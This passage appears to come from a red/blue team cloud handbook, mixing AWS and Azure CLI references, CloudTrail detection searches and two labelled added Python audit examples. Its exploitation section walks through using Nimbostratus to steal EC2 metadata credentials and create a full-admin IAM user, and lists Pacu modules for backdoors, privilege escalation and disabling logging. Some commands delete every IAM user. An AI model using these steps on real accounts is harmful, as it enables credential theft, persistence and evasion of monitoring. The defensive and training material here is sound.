aws cloudtrail add-tags --resource-id awslog --tags-list "Key=log-type,Value=all"

List the tags of a trail


aws cloudtrail list-tags --resource-id-list <trail_arn>

Remove a tag from a trail


aws cloudtrail remove-tags --resource-id awslog --tags-list "Key=log-type,Value=all"

IAM USERS
**Limits = 5000 users, 100 groups, 250 roles, 2 access keys per user

List all user's info


aws iam list-users

List all user's usernames


aws iam list-users --output text | cut -f 6

List current user's info


aws iam get-user

List current user's access keys


aws iam list-access-keys

Create new user


aws iam create-user --user-name aws-admin2

Create multiple new users from file


allUsers=$(cat ./[Link])
for userName in $allUsers; do
aws iam create-user --user-name $userName
done

List all users


aws iam list-users --no-paginate

Get a specific user's info


aws iam get-user --user-name aws-admin2

Delete one user


aws iam delete-user --user-name aws-admin2

Delete all users


allUsers=$(aws iam list-users --output text | cut -f 6)
for userName in $allUsers; do
aws iam delete-user --user-name $userName
done

IAM PASSWORD POLICY


List password policy
aws iam get-account-password-policy

Set password policy


aws iam update-account-password-policy \
--minimum-password-length 12 \
--require-symbols \
--require-numbers \
--require-uppercase-characters \
--require-lowercase-characters \
--allow-users-to-change-password

Delete password policy


aws iam delete-account-password-policy

IAM ACCESS KEYS


List all access keys
aws iam list-access-keys

List access keys of a specific user


aws iam list-access-keys --user-name aws-admin2

Create a new access key


aws iam create-access-key --user-name aws-admin2 --output text | tee [Link]

List last access time of an access key


aws iam get-access-key-last-used --access-key-id AKIAINA6AJZY4EXAMPLE

Deactivate an access key


aws iam update-access-key --access-key-id AKIAI44QH8DHBEXAMPLE --status Inactive --user-name aws-admin2

Delete an access key


aws iam delete-access-key --access-key-id AKIAI44QH8DHBEXAMPLE --user-name aws-admin2

IAM GROUPS, POLICIES, MANAGED POLICIES

List all groups
aws iam list-groups

Create a group
aws iam create-group --group-name FullAdmins

Delete a group
aws iam delete-group --group-name FullAdmins

List all policies
aws iam list-policies

Get a specific policy
aws iam get-policy --policy-arn <value>

List all users, groups, and roles, for a given policy
aws iam list-entities-for-policy --policy-arn <value>

List policies, for a given group
aws iam list-attached-group-policies --group-name FullAdmins

Add a policy to a group
aws iam attach-group-policy --group-name FullAdmins --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

Add a user to a group
aws iam add-user-to-group --group-name FullAdmins --user-name aws-admin2

List users, for a given group
aws iam get-group --group-name FullAdmins

List groups, for a given user
aws iam list-groups-for-user --user-name aws-admin2

Remove a user from a group
aws iam remove-user-from-group --group-name FullAdmins --user-name aws-admin2

Remove a policy from a group
aws iam detach-group-policy --group-name FullAdmins --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

Delete a group
aws iam delete-group --group-name FullAdmins
S3 BUCKETS
List existing S3 buckets
aws s3 ls

Create a public facing bucket
aws s3api create-bucket --acl "public-read-write" --bucket bucket_name

Verify bucket was created
aws s3 ls | grep bucket_name

Check for public facing s3 buckets
aws s3api list-buckets --query 'Buckets[*].[Name]' --output text | xargs -I {} bash -c 'if [[ $(aws s3api get-bucket-acl --bucket {} --query '"'"'Grants[?[Link]==`[Link]llUsers` && Permission==`READ`]'"'"' --output text) ]]; then echo {} ; fi'

Check for public facing s3 buckets & update them to be private
aws s3api list-buckets --query 'Buckets[*].[Name]' --output text | xargs -I {} bash -c 'if [[ $(aws s3api get-bucket-acl --bucket {} --query '"'"'Grants[?[Link]==`[Link]llUsers` && Permission==`READ`]'"'"' --output text) ]]; then aws s3api put-bucket-acl --acl "private" --bucket {} ; fi'
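The same public-grant check as an offline function, an added example that is not part of the handbook: it evaluates the JSON that `aws s3api get-bucket-acl` returns (a constructed sample is embedded) with the Grantee URI / Permission test the one-liner uses, extended to AuthenticatedUsers grants and to permissions other than READ, and builds the ACL that `put-bucket-acl --acl private` leaves behind.

```python
import json
from typing import Dict, List

# Real S3 group URIs whose presence in an ACL grant exposes the bucket.
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
PUBLIC_GROUPS = {ALL_USERS: "AllUsers", AUTH_USERS: "AuthenticatedUsers"}


def _is_public_grant(grant: Dict) -> bool:
    """True when the grantee is one of the two public S3 groups."""
    grantee = grant.get("Grantee", {})
    return grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS


def public_grants(acl: Dict) -> List[Dict[str, str]]:
    """Return every public grant in a get-bucket-acl document.

    The one-liner above only matches AllUsers with Permission READ; this also
    reports AuthenticatedUsers and WRITE/READ_ACP/WRITE_ACP/FULL_CONTROL,
    which are at least as dangerous.
    """
    return [
        {"group": PUBLIC_GROUPS[g["Grantee"]["URI"]],
         "permission": g.get("Permission", "")}
        for g in acl.get("Grants", [])
        if _is_public_grant(g)
    ]


def make_private(acl: Dict) -> Dict:
    """Return the ACL with public group grants removed: the state that
    `put-bucket-acl --acl private` produces (the owner keeps FULL_CONTROL)."""
    return {
        "Owner": acl.get("Owner"),
        "Grants": [g for g in acl.get("Grants", []) if not _is_public_grant(g)],
    }


def audit_buckets(acls: Dict[str, Dict]) -> Dict[str, List[Dict[str, str]]]:
    """Map bucket name -> public grants, listing only the exposed buckets."""
    report = {}
    for name, acl in acls.items():
        grants = public_grants(acl)
        if grants:
            report[name] = grants
    return report


# Constructed sample in the shape `aws s3api get-bucket-acl` returns: the
# owner grant plus a public-read grant and an authenticated-users write grant.
# The owner ID is a placeholder, not a real canonical ID.
SAMPLE_ACL = json.loads("""
{
  "Owner": {"ID": "EXAMPLE-OWNER-CANONICAL-ID"},
  "Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "EXAMPLE-OWNER-CANONICAL-ID"},
     "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group",
                 "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"},
    {"Grantee": {"Type": "Group",
                 "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"},
     "Permission": "WRITE"}
  ]
}
""")

if __name__ == "__main__":
    # "open-bucket" is exposed; "fixed-bucket" is the same ACL after remediation.
    report = audit_buckets({"open-bucket": SAMPLE_ACL,
                            "fixed-bucket": make_private(SAMPLE_ACL)})
    print(json.dumps(report, indent=2))
```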

EC2 KEYPAIRS
List all keypairs
aws ec2 describe-key-pairs

Create a keypair
aws ec2 create-key-pair --key-name <value> --output text

Create a new local private / public keypair, using RSA 4096-bit


ssh-keygen -t rsa -b 4096

Import an existing keypair


aws ec2 import-key-pair --key-name keyname_test --public-key-material [Link]

Delete a keypair
aws ec2 delete-key-pair --key-name <value>

SECURITY GROUPS
List all security groups
aws ec2 describe-security-groups

Create a security group
aws ec2 create-security-group --vpc-id vpc-1a2b3c4d --group-name web-access --description "web access"

List details about a security group
aws ec2 describe-security-groups --group-id sg-0000000

Open port 80, for all users
aws ec2 authorize-security-group-ingress --group-id sg-0000000 --protocol tcp --port 80 --cidr [Link]/24

Open port 22, just for "my IP"
aws ec2 authorize-security-group-ingress --group-id sg-0000000 --protocol tcp --port 22 --cidr <my_ip>/32

Remove a firewall rule from a group
aws ec2 revoke-security-group-ingress --group-id sg-0000000 --protocol tcp --port 80 --cidr [Link]/24

Delete a security group
aws ec2 delete-security-group --group-id sg-00000000

IMAGES
List all private AMI's, ImageId and Name tags
aws ec2 describe-images --filter "Name=is-public,Values=false" --query 'Images[].[ImageId, Name]' --output text | sort -k2

Delete an AMI, by ImageId


aws ec2 deregister-image --image-id ami-00000000

INSTANCES
List all instances (running, and not running)
aws ec2 describe-instances

List all instances running


aws ec2 describe-instances --filters Name=instance-state-name,Values=running

Create a new instance

aws ec2 run-instances --image-id ami-f0e7d19a --instance-type [Link] --security-group-ids sg-00000000 --dry-run

Terminate an instance (this deletes it; stop-instances stops it without deleting)
aws ec2 terminate-instances --instance-ids <instance_id>

List status of all instances


aws ec2 describe-instance-status

List status of a specific instance


aws ec2 describe-instance-status --instance-ids <instance_id>

List all running instance, Name tag and Public IP Address


aws ec2 describe-instances --filters Name=instance-state-name,Values=running --query 'Reservations[].Instances[].[PublicIpAddress, Tags[?Key==`Name`].Value | [0] ]' --output text | sort -k2

INSTANCES TAGS
List the tags of an instance
aws ec2 describe-tags

Add a tag to an instance
aws ec2 create-tags --resources "ami-1a2b3c4d" --tags Key=name,Value=debian

Delete a tag on an instance
aws ec2 delete-tags --resources "ami-1a2b3c4d" --tags Key=Name,Value=

CLOUDWATCH LOG GROUPS


Create a group
aws logs create-log-group --log-group-name "DefaultGroup"

List all log groups


aws logs describe-log-groups

aws logs describe-log-groups --log-group-name-prefix "Default"

Delete a group
aws logs delete-log-group --log-group-name "DefaultGroup"

CLOUDWATCH LOG STREAMS

Create a log stream
aws logs create-log-stream --log-group-name "DefaultGroup" --log-stream-name "syslog"

List details on a log stream
aws logs describe-log-streams --log-group-name "DefaultGroup"

aws logs describe-log-streams --log-group-name "DefaultGroup" --log-stream-name-prefix "syslog"

Delete a log stream
aws logs delete-log-stream --log-group-name "DefaultGroup" --log-stream-name "Default Stream"

LAMBDA
Get Lambda function config
aws lambda get-function-configuration --function-name <CUSTOM_FUNCTION_NAME> --profile <PROFILE_NAME>

SNS
Get Simple Notification Service configurations
aws sns list-topics --profile <PROFILE_NAME>
aws sns get-topic-attributes --topic-arn "arn:aws:sns:us-east-1:945109781822:<custom_suffix>" --profile <PROFILE_NAME>
aws sns list-subscriptions --profile <PROFILE_NAME>
aws sns get-subscription-attributes --subscription-arn "arn:aws:sns:us-east-1:945109781822:<custom_part>:6d92f5d3-f299-485d-b6fb-1aca6d9a497c" --profile <PROFILE_NAME>

RDS
Get database instances
aws rds describe-db-security-groups --db-security-group-name <DB_SG_NAME> --profile <PROFILE_NAME>
aws rds describe-db-instances --db-instance-identifier <DB_INSTANCE_ID> --profile <PROFILE_NAME>

REFERENCE:
[Link]
[Link]
[Link]

AWS_Defend

BLUE TEAM FORENSICS CLOUD

CLOUDTRAIL MONITORING
Successful Logins
Example search below returns successful authentications without
multi-factor authentication. It can help detect suspicious logins
or accounts on which MFA is not enforced.
sourcetype="aws:cloudtrail" eventName="ConsoleLogin" "[Link]"=Success "[Link]"=No

Failed Logins by Source


Example search returns a table of failed authentications, including
the source IP, country, city and the reason why the authentication
failed.
sourcetype="aws:cloudtrail" eventName="ConsoleLogin" "[Link]"=Failure
| iplocation sourceIPAddress
| stats count by userName, [Link], eventSource, sourceIPAddress, Country, City, errorMessage
| sort - count

CryptoMining GPU Instance Abuse


Example of Splunk search to identify GPU instances that have been
started.
sourcetype="aws:cloudtrail" eventSource="[Link]" eventName="RunInstances"
| spath output=instanceType path=[Link]
| spath output=minCount path=[Link]{}.items{}.minCount
| search instanceType IN ("p3.2xlarge", "p3.8xlarge", "p3.16xlarge", "p3dn.24xlarge", "[Link]", "p2.8xlarge", "p2.16xlarge", "[Link]", "g3.4xlarge", "g3.8xlarge", "g3.16xlarge")
| stats count by eventSource, eventName, awsRegion, userName, [Link], sourceIPAddress, [Link], [Link], [Link]{}.instanceId, [Link]{}.[Link]{}.privateIpAddress, minCount
| fields - count

Security Group Configurations


Example search below looks for rules allowing inbound traffic on
port 22 from any IPs. Then we look for the associated instance IDs
and append them to the list.
sourcetype="aws:cloudtrail" eventSource="[Link]" eventName="AuthorizeSecurityGroupIngress"
| spath output=fromPort path=[Link]{}.fromPort
| spath output=toPort path=[Link]{}.toPort
| spath output=cidrIp path=[Link]{}.[Link]{}.cidrIp
| spath output=groupId path=[Link]
| spath output=accountId path=[Link]
| spath output=type path=[Link]
| search fromPort=22 toPort=22 AND cidrIp="[Link]/0"
| spath output=ipPermissions path=[Link]{}
| mvexpand ipPermissions
| fields - fromPort, toPort, cidrIp
| spath input=ipPermissions
| spath output=cidrIp path=[Link]{}.cidrIp input=ipPermissions
| join groupId
    [ search index=aws eventName=RunInstances earliest=-7d
    | fields "[Link]{}.[Link]{}.groupId", "[Link]{}.instanceId"
    | rename [Link]{}.[Link]{}.groupId as groupId, "[Link]{}.instanceId" as instanceId ]
| stats values(instanceId) by groupId, userName, accountId, type, sourceIPAddress, cidrIp, fromPort, toPort, ipProtocol

Network ACL Creation


Example below searches for creation of Network ACL rules allowing
inbound connections from any sources.
sourcetype="aws:cloudtrail" eventSource="[Link]"
eventName=CreateNetworkAclEntry
| spath output=cidrBlock path=[Link]
| spath output=ruleAction path=[Link]
| search cidrBlock=[Link]/0 ruleAction=Allow

Detect Public S3 Buckets


Example search looking for the PutBucketAcl event name where the
grantee URI is AllUsers; with it we can identify and report the open
buckets.
sourcetype=aws:cloudtrail AllUsers eventName=PutBucketAcl errorCode=Success
| spath output=userIdentityArn path=[Link]
| spath output=bucketName path=[Link]
| spath output=aclControlList path=[Link]
| spath input=aclControlList output=grantee path=Grant{}
| mvexpand grantee
| spath input=grantee
| search [Link]=*AllUsers
| rename userIdentityArn as user
| table _time, src, awsRegion, Permission, [Link], bucketName, user
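Three of the searches above (Successful Logins, Security Group Configurations, Network ACL Creation) expressed as offline detection rules, an added example that is not part of the handbook: it runs them over constructed CloudTrail records embedded below, and generalises the security-group rule from fromPort=22 toPort=22 to any port range that covers 22 and to the IPv6 wildcard.

```python
import json
from typing import Any, Dict, List, Optional

Event = Dict[str, Any]
ANY_V4, ANY_V6 = "0.0.0.0/0", "::/0"

# Constructed CloudTrail records. The field names (responseElements.ConsoleLogin,
# additionalEventData.MFAUsed, requestParameters.ipPermissions.items[], ...) are
# the real CloudTrail ones the searches above key on; the users and IPs are made up.
SAMPLE_EVENTS: List[Event] = [json.loads(s) for s in (
    '{"eventName": "ConsoleLogin", "eventSource": "signin.amazonaws.com",'
    ' "userIdentity": {"userName": "alice"}, "sourceIPAddress": "198.51.100.7",'
    ' "responseElements": {"ConsoleLogin": "Success"},'
    ' "additionalEventData": {"MFAUsed": "No"}}',
    '{"eventName": "ConsoleLogin", "eventSource": "signin.amazonaws.com",'
    ' "userIdentity": {"userName": "bob"}, "sourceIPAddress": "198.51.100.8",'
    ' "responseElements": {"ConsoleLogin": "Success"},'
    ' "additionalEventData": {"MFAUsed": "Yes"}}',
    '{"eventName": "AuthorizeSecurityGroupIngress", "eventSource": "ec2.amazonaws.com",'
    ' "userIdentity": {"userName": "carol"}, "sourceIPAddress": "203.0.113.5",'
    ' "requestParameters": {"groupId": "sg-0000000", "ipPermissions": {"items": ['
    '   {"ipProtocol": "tcp", "fromPort": 22, "toPort": 22,'
    '    "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}},'
    '   {"ipProtocol": "tcp", "fromPort": 443, "toPort": 443,'
    '    "ipRanges": {"items": [{"cidrIp": "10.0.0.0/8"}]}}]}}}',
    '{"eventName": "CreateNetworkAclEntry", "eventSource": "ec2.amazonaws.com",'
    ' "userIdentity": {"userName": "dave"}, "sourceIPAddress": "203.0.113.9",'
    ' "requestParameters": {"networkAclId": "acl-0000000", "cidrBlock": "0.0.0.0/0",'
    '   "ruleAction": "allow", "egress": false}}',
)]


def _user(ev: Event) -> str:
    return ev.get("userIdentity", {}).get("userName", "<unknown>")


def login_without_mfa(ev: Event) -> Optional[str]:
    """Rule 1 (Successful Logins): console login that succeeded without MFA."""
    if ev.get("eventName") != "ConsoleLogin":
        return None
    if ev.get("responseElements", {}).get("ConsoleLogin") != "Success":
        return None
    if ev.get("additionalEventData", {}).get("MFAUsed") == "Yes":
        return None
    return "successful console login without MFA"


def open_ssh_ingress(ev: Event) -> List[str]:
    """Rule 2 (Security Group Configurations): ingress rules open to any
    address whose port range covers 22; also catches 0-65535 and ::/0."""
    if ev.get("eventName") != "AuthorizeSecurityGroupIngress":
        return []
    params = ev.get("requestParameters", {})
    group = params.get("groupId", "<unknown>")
    hits = []
    for perm in params.get("ipPermissions", {}).get("items", []):
        lo, hi = perm.get("fromPort", 0), perm.get("toPort", 65535)
        if not lo <= 22 <= hi:
            continue
        cidrs = [r.get("cidrIp") for r in perm.get("ipRanges", {}).get("items", [])]
        cidrs += [r.get("cidrIpv6") for r in perm.get("ipv6Ranges", {}).get("items", [])]
        for cidr in cidrs:
            if cidr in (ANY_V4, ANY_V6):
                hits.append(f"{group} {perm.get('ipProtocol')} {lo}-{hi} from {cidr}")
    return hits


def open_nacl_entry(ev: Event) -> Optional[str]:
    """Rule 3 (Network ACL Creation): inbound allow entry from any source."""
    if ev.get("eventName") != "CreateNetworkAclEntry":
        return None
    p = ev.get("requestParameters", {})
    if p.get("egress") or str(p.get("ruleAction", "")).lower() != "allow":
        return None
    cidr = p.get("cidrBlock") or p.get("ipv6CidrBlock")
    if cidr not in (ANY_V4, ANY_V6):
        return None
    return f"{p.get('networkAclId', '<unknown>')} allows inbound from {cidr}"


def detect(events: List[Event]) -> List[Dict[str, str]]:
    """Run the three rules over a batch of events; one finding per hit."""
    findings = []
    for ev in events:
        base = {"user": _user(ev), "src": ev.get("sourceIPAddress", "")}
        d = login_without_mfa(ev)
        if d:
            findings.append({"rule": "ConsoleLoginNoMFA", "detail": d, **base})
        for d in open_ssh_ingress(ev):
            findings.append({"rule": "OpenSSHIngress", "detail": d, **base})
        d = open_nacl_entry(ev)
        if d:
            findings.append({"rule": "OpenNaclAllow", "detail": d, **base})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['rule']:18} {f['user']:8} {f['src']:15} {f['detail']}")
```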

VPC Traffic Mirroring


Capture & Inspect Network Traffic
aws ec2 create-traffic-mirror-filter --description "TCP Filter"

REFERENCE:
[Link]
[Link]
[Link]#create-traffic-mirroring-filter

AWS_Exploit
RED TEAM EXPLOITATION CLOUD

NIMBOSTRATUS
Install
git clone git@[Link]:andresriancho/[Link]
cd nimbostratus
pip install -r [Link]

Prerequisites
Amazon AWS User account
Access Key
Boto Python 2.7 library

Insert VULN_URL into the utils/[Link] file. Run dump-ec2-metadata:
nimbostratus -v dump-ec2-metadata --mangle-function=[Link]

Enumerate meta-data service of target using mangle function & retrieve any access key credentials found on the meta-data server:
nimbostratus -v dump-credentials --mangle-function=[Link]

Dump all permissions for the provided credentials. Use right after
dump-credentials to know which permissions are available:
nimbostratus dump-permissions --access-key=**************PXXQ --secret-key=*****************************SUW --token *****************************************JFE

Create a new user. Assigns a random name to the created user and
attaches a policy which looks like this:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]
}
Execute:
nimbostratus -v create-iam-user --access-key **************UFUA --secret-key **************************************DDxSZ --token ****************************************tecaoI

Create RDS database snapshot:


nimbostratus -v snapshot-rds --access-key ********AUFUA --secret-key *****************************yDDxSZ --token ************************************************K2g2QU= --rds-name <DB_NAME> --password ********* --region us-west-2

PACU
Install
git clone [Link]
cd pacu
bash [Link]
python3 [Link]

Starting Pacu
python3 [Link]
>set_keys
#Key alias - Used internally within Pacu and is associated with a
AWS key pair. Has no bearing on AWS permissions.
#Access Key - Generated from an AWS User
#Secret Key - Secret key associated with access key. Omitted in
image.
#(Optional) Session Key - serves as a temporary access key to
access AWS services.
**provide a session name, after which you can add your compromised
credentials with the set_keys command and begin running modules

Running Modules
#list out modules
> ls
SYNTAX:> run <module_name> [--keyword-arguments]

PACU MODULES
iam__enum_assume_role
Enumerates existing roles in other AWS accounts to try and gain
access via misconfigurations.

iam__enum_users
Enumerates IAM users in a separate AWS account, given the account
ID.

s3__bucket_finder
Enumerates/bruteforces S3 buckets based on different parameters.

aws__enum_account
Enumerates data about the account itself.

aws__enum_spend
Enumerates account spend by service.

codebuild__enum
Enumerates CodeBuild builds and projects while looking for
sensitive data

ebs__enum_volumes_snapshots
Enumerates EBS volumes and snapshots and logs any without
encryption.

ec2__check_termination_protection
Collects a list of EC2 instances without termination protection.

ec2__download_userdata
Downloads User Data from EC2 instances.

ec2__enum
Enumerates a ton of relevant EC2 info.

glue__enum
Enumerates Glue connections, crawlers, databases, development
endpoints, and jobs.

iam__enum_permissions
Tries to get a confirmed list of permissions for the current (or
all) user(s).

iam__enum_users_roles_policies_groups
Enumerates users, roles, customer-managed policies, and groups.

iam__get_credential_report
Generates and downloads an IAM credential report.

inspector__get_reports
Captures vulnerabilities found when running a preconfigured
inspector report.

lambda__enum
Enumerates data from AWS Lambda.

lightsail__enum
Captures common data associated with Lightsail

iam__privesc_scan
An IAM privilege escalation path finder and abuser.
**WARNING: Due to the implementation in IAM policies, this module
has a difficult time parsing "NotActions".

LATERAL_MOVE

cloudtrail__csv_injection
Inject malicious formulas/data into CloudTrail event history.

vpc__enum_lateral_movement
Looks for Network Plane lateral movement opportunities.

api_gateway__create_api_keys
Attempts to create an API Gateway key for any/all REST APIs that
are defined.

ebs__explore_snapshots
Restores and attaches EBS volumes/snapshots to an EC2 instance of
your choice.

ec2__startup_shell_script
Stops and restarts EC2 instances to execute code.

lightsail__download_ssh_keys
Downloads Lightsail's default SSH key pairs.

lightsail__generate_ssh_keys
Creates SSH keys for available regions in AWS Lightsail.

lightsail__generate_temp_access
Creates temporary SSH keys for available instances in AWS
Lightsail.

systemsmanager__rce_ec2
Tries to execute code as root/SYSTEM on EC2 instances.
**NOTE: Linux targets will run the command using their default
shell (bash/etc.) and Windows hosts will run the command using
PowerShell, so be wary of that when trying to run the same command
against both operating systems.
**NOTE: Systems Manager Run Command can delay the results of a call
by a random amount. Experienced 15 minute delays before command was
executed on the target.

ec2__backdoor_ec2_sec_groups
Adds backdoor rules to EC2 security groups.

iam__backdoor_assume_role
Creates assume-role trust relationships between users and roles.

iam__backdoor_users_keys
Adds API keys to other users.

iam__backdoor_users_password
Adds a password to users without one.

s3__download_bucket
Enumerate and dumps files from S3 buckets.

cloudtrail__download_event_history
Downloads CloudTrail event history to JSON files to ./sessions/[current_session_name]/downloads/cloudtrail_[region]_event_history_[timestamp].json.
**NOTE: This module can take a very long time to complete. A rough
estimate is about 10000 events retrieved per five minutes.

cloudwatch__download_logs
Captures CloudWatch logs and downloads them to the session
downloads folder

detection__disruption
Disables, deletes, or minimizes various logging/monitoring
services.

detection__enum_services
Detects monitoring and logging capabilities.

elb__enum_logging
Collects a list of Elastic Load Balancers without access logging and writes a list of ELBs with logging disabled to ./sessions/[current_session_name]/downloads/elbs_no_logs_[timestamp].csv.

guardduty__whitelist_ip
Adds an IP address to the list of trusted IPs in GuardDuty.
**NOTE: This will not erase any existing GuardDuty findings, it
will only prevent future findings related to the included IP
addresses.

**WARNING: Only one list of trusted IP addresses is allowed per
GuardDuty detector. This module will prompt you to delete an
existing list if you would like, but doing so could have unintended
bad consequences on the target AWS environment.

waf__enum
Detects rules and rule groups for WAF.

REFERENCE:
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]

AWS_Hardening
BLUE TEAM CONFIGURATION CLOUD

AWS Best Practices Rules


[Link]

AWS_Terms
ALL GENERAL CLOUD

AWS IoT: AWS IoT is a managed cloud service that lets connected
devices easily and securely interact with cloud applications and
other devices.
Certificate Manager: AWS Certificate Manager lets you easily
provision, manage, and deploy Secure Sockets Layer/Transport Layer
Security (SSL/TLS) certificates for use with AWS services.
CloudFormation: AWS CloudFormation lets you create and update a
collection of related AWS resources in a predictable fashion.
CloudFront: Amazon CloudFront provides a way to distribute
content to end-users with low latency and high data transfer
speeds.
CloudSearch: AWS CloudSearch is a fully managed search service
for websites and apps.
CloudTrail: AWS CloudTrail provides increased visibility into
user activity by recording API calls made on your account.

Data Pipeline: AWS Data Pipeline is a lightweight orchestration
service for periodic, data-driven workflows.
DMS: AWS Database Migration Service (DMS) helps you migrate
databases to the cloud easily and securely while minimizing
downtime.
DynamoDB: Amazon DynamoDB is a scalable NoSQL data store that
manages distributed replicas of your data for high availability.
EC2: Amazon Elastic Compute Cloud (EC2) provides resizable
compute capacity in the cloud.
EC2 Container Service: Amazon ECS allows you to easily run and
manage Docker containers across a cluster of Amazon EC2
instances.
Elastic Beanstalk: AWS Elastic Beanstalk is an application
container for deploying and managing applications.
ElastiCache: Amazon ElastiCache improves application performance
by allowing you to retrieve information from an in-memory
caching system.
Elastic File System: Amazon Elastic File System (Amazon EFS) is
a file storage service for Amazon Elastic Compute Cloud (Amazon
EC2) instances.
Elasticsearch Service: Amazon Elasticsearch Service is a managed
service that makes it easy to deploy, operate, and scale
Elasticsearch, a popular open-source search and analytics engine.
Elastic Transcoder: Amazon Elastic Transcoder lets you convert
your media files in the cloud easily, at low cost, and at scale.
EMR: Amazon Elastic MapReduce lets you perform big data tasks
such as web indexing, data mining, and log file analysis.
Glacier: Amazon Glacier is a low-cost storage service that
provides secure and durable storage for data archiving and
backup.
IAM: AWS Identity and Access Management (IAM) lets you securely
control access to AWS services and resources.
Inspector: Amazon Inspector enables you to analyze the behavior
of the applications you run in AWS and helps you to identify
potential security issues.
Kinesis: Amazon Kinesis services make it easy to work with real-
time streaming data in the AWS cloud.
Lambda: AWS Lambda is a compute service that runs your code in
response to events and automatically manages the compute
resources for you.
Machine Learning: Amazon Machine Learning is a service that
enables you to easily build smart applications.
OpsWorks: AWS OpsWorks is a DevOps platform for managing
applications of any scale or complexity on the AWS cloud.
RDS: Amazon Relational Database Service (RDS) makes it easy to
set up, operate, and scale familiar relational databases in the
cloud.
Redshift: Amazon Redshift is a fast, fully managed, petabyte-scale
data warehouse that makes it cost-effective to analyze all your
data using your existing business intelligence tools.

Route 53: Amazon Route 53 is a scalable and highly available
Domain Name System (DNS) and Domain Name Registration service.
SES: Amazon Simple Email Service (SES) enables you to send and
receive email.
SNS: Amazon Simple Notification Service (SNS) lets you publish
messages to subscribers or other applications.
Storage Gateway: AWS Storage Gateway securely integrates
on-premises IT environments with cloud storage for backup and
disaster recovery.
SQS: Amazon Simple Queue Service (SQS) offers a reliable, highly
scalable, hosted queue for storing messages.
SWF: Amazon Simple Workflow (SWF) coordinates all of the
processing steps within an application.
S3: Amazon Simple Storage Service (S3) can be used to store and
retrieve any amount of data.
VPC: Amazon Virtual Private Cloud (VPC) lets you launch AWS
resources in a private, isolated cloud.

REFERENCE:
[Link]

AWS_Tricks
ALL MISC CLOUD

SUBNETS
Creating A Subnet
aws ec2 create-subnet --vpc-id <vpc_id> --cidr-block <cidr_block> --availability-zone <availability_zone> --region <region>

Auto Assigning Public IPs To Instances In A Public Subnet
aws ec2 modify-subnet-attribute --subnet-id <subnet_id> --map-public-ip-on-launch --region <region>

VPC
Creating A VPC
aws ec2 create-vpc --cidr-block <cidr_block> --region <region>

Allowing DNS hostnames
aws ec2 modify-vpc-attribute --vpc-id <vpc_id> --enable-dns-hostnames "{\"Value\":true}" --region <region>

NAT

Setting Up A NAT Gateway
#Allocate Elastic IP
aws ec2 allocate-address --domain vpc --region <region>

#Use the AllocationId to create the NAT Gateway for the public zone
aws ec2 create-nat-gateway --subnet-id <subnet_id> --allocation-id <allocation_id> --region <region>

S3 API
Listing Only Bucket Names
aws s3api list-buckets --query 'Buckets[].Name'

Getting a Bucket Region


aws s3api get-bucket-location --bucket <bucket_name>

Syncing a Local Folder with a Bucket


aws s3 sync <local_path> s3://<bucket_name>

Copying Folders
aws s3 cp <folder_name>/ s3://<bucket_name>/ --recursive

To exclude files from copying
aws s3 cp <folder_name>/ s3://<bucket_name>/ --recursive --exclude "<file_name_or_a_wildcard_extension>"

To exclude a folder from copying
aws s3 cp [Link]/ s3://example-backup/ --recursive --exclude ".git/*"

Removing a File from a Bucket


aws s3 rm s3://<bucket_name>/<file_name>

Deleting a Bucket
aws s3 rb s3://<bucket_name> --force

Emptying a Bucket
aws s3 rm s3://<bucket_name>/<key_name> --recursive

EC2 Instance
Creating AMI Without Rebooting the Machine
aws ec2 create-image --instance-id <instance_id> --name "image-$(date +'%Y-%m-%d_%H-%M-%S')" --description "image-$(date +'%Y-%m-%d_%H-%M-%S')" --no-reboot

LAMBDA
Using AWS Lambda with Scheduled Events
sid=Sid$(date +%Y%m%d%H%M%S); aws lambda add-permission --statement-id $sid --action 'lambda:InvokeFunction' --principal [Link] --source-arn arn:aws:events:<region>:<arn>:rule/AWSLambdaBasicExecutionRole --function-name function:<awsents> --region <region>

Deleting Unused Volumes
for x in $(aws ec2 describe-volumes --filters Name=status,Values=available | grep VolumeId | awk '{print $2}' | tr ',|"' ' '); do aws ec2 delete-volume --region <region> --volume-id $x; done

With "profile":
for x in $(aws ec2 describe-volumes --filters Name=status,Values=available --profile <your_profile_name> | grep VolumeId | awk '{print $2}' | tr ',|"' ' '); do aws ec2 delete-volume --region <region> --volume-id $x --profile <your_profile_name>; done

REFERENCE:
[Link]

AZURE CLI
RED/BLUE TEAM RECON/ADMIN CLOUD
Azure command-line interface (Azure CLI) is an environment to
create and manage Azure resources.

Login in CLI
az login -u myemail@[Link]

List accounts
az account list

Set subscription
az account set --subscription "xxx"

List all locations
az account list-locations

List all resource groups
az group list

Get version of the CLI
az --version

Get help
az --help

Get all available VM sizes
az vm list-sizes --location <region>

Get all available VM images for Windows and Linux
az vm image list --output table

Create an Ubuntu Linux VM
az vm create --resource-group myResourceGroup --name myVM --image UbuntuLTS

Create a Windows Datacenter VM
az vm create --resource-group myResourceGroup --name myVM --image Win2016Datacenter

Create a Resource group
az group create --name myresourcegroup --location eastus

Create a Storage account
az storage account create -g myresourcegroup -n mystorageaccount -l eastus --sku Standard_LRS

Permanently delete a resource group
az group delete --name <myResourceGroup>

List VMs
az vm list

Start a VM
az vm start --resource-group myResourceGroup --name myVM

Stop a VM
az vm stop --resource-group myResourceGroup --name myVM

Deallocate a VM
az vm deallocate --resource-group myResourceGroup --name myVM

Restart a VM
az vm restart --resource-group myResourceGroup --name myVM

Redeploy a VM
az vm redeploy --resource-group myResourceGroup --name myVM

Delete a VM
az vm delete --resource-group myResourceGroup --name myVM

Create image of a VM
az image create --resource-group myResourceGroup --source myVM --name myImage

Create VM from image
az vm create --resource-group myResourceGroup --name myNewVM --image myImage

List VM extensions
